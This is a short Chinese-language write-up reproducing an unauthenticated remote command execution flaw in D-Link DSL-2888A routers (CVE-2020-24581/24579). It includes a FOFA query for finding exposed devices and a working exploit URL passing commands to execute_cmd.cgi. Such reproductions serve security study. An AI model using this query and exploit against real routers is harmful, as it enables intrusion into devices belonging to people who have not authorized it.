D-Link (CVE-2020-24581/24579) RCE漏洞复现

简介

D-Link DSL-2888A AU_2.31_V1.1.47ae55之前版本漏洞源于包含一个execute cmd.cgi特性、该特性允许经过身份验证的用户执行操作系统命令，在该版本固件中同时存在着一个不安全认证漏洞（CVE-2020-24580），在登录界面输入任意密码就可以成功访问路由器界面，组合这两个漏洞以实现未授权的任意代码执行。

fofa

body="DSL-2888A"

影响范围

AU_2.31_V1.1.47ae55 <=

EG_1.00b4

漏洞复现

访问主页，大概是这个样子的，默认主页路径“/page/login/login.html”

exp

这里不管什么参数都会识别，参数没有进行限制

/cgi-bin/execute_cmd.cgi?exp=&exp=id

成功执行了 "id" 命令

声明
提供的技术仅供学习参考测试，利用本文提供的信息造成的直接或简介损失由使用者自行承担。

---

结语

当陪你的那个人要下车时，即便你再不舍，也要心存感激，挥手告别，每一个人的故事最初都是极具温柔的开头，但往往故事的结尾配不上整个开头，但每一个意难平的结果，都是我们最好的结局。